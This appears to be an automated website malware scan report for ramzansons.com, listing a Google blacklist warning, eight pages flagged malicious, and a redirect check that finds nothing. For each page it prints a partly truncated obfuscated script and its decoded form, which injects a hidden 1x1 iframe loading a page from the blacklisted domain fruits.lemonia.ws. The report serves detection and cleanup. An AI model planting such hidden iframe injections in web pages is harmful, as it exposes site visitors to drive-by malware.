Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ramzansons.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ramzansons.com/ | 200 OK Content-Length: 13621 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/m&o.html | 200 OK Content-Length: 12825 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/home.html | 200 OK Content-Length: 13621 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/scope.html | 200 OK Content-Length: 14419 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/investment.html | 200 OK Content-Length: 13134 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/clients.html | 200 OK Content-Length: 13870 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/team.html | 200 OK Content-Length: 15488 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/contactus.html | 200 OK Content-Length: 13096 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: fruits.lemonia.ws var DQfgp="P8uqn3Duqn27uqn";var z4bw="lace(/uqn/";var F4R92H="70J554J5";var YbybZ="8o564o56Fo563o";var KTb094E="Q65JFQ20JFQ28";var eadqu="Eo53Co5";var FSeWTYT="579TMvDJ527";var zArpa="FQ6FJFQ63JFQ";var dGxjSkzj="8uqn27uqnP9uqn";var Pln5CV="escape(E9I";var vPv2kxe="uqnPDuqnP5u";var Y1buTs="'%').replace(";var WMNi9sx="ce(/v/";KTb094E+="JFQ74JFQ34JFQ";var rlzV="PCuqnP5uqnPDuq";var NeCBO09N="uqnPFuqnP3u";var Ljz1KXSF="o574o534o559o";var CJv9pZK="'%3')));";v ...[3543 bytes skipped]... Decoded script: ...[4108 bytes skipped]... 5/g,'%').replace(/TMV/g,'%3'))); var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; var t4YS="<div id='YsfkwgCnKm'></div>";if(document.body==null)t4YS='<body>'+t4YS+'</body>'; document.write (t4YS); document.write (t4YS); var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; var pTxpPsXw=document.getElementById('YsfkwgCnKm');var lMgu=document.createElement('iframe');lMgu.src='http://fruits.lemonia.ws/Tbl';lMgu.width='1'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.height='1';lMgu.name='njt5NXR7'; lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); lMgu.style.visibility='hidden';pTxpPsXw.appendChild(lMgu); <div id='YsfkwgCnKm'></div> | ||
http://ramzansons.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ramzansons.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 05:09:49 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 13621
Content-Type: text/html
Last-Modified: Mon, 28 Apr 2008 20:27:34 GMT
...13621 bytes of data.
GET / HTTP/1.1
Host: ramzansons.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 05:09:49 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 13621
Content-Type: text/html
Last-Modified: Mon, 28 Apr 2008 20:27:34 GMT
...13621 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ramzansons.com
Referer: http://www.google.com/search?q=ramzansons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ramzansons.com
Referer: http://www.google.com/search?q=ramzansons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.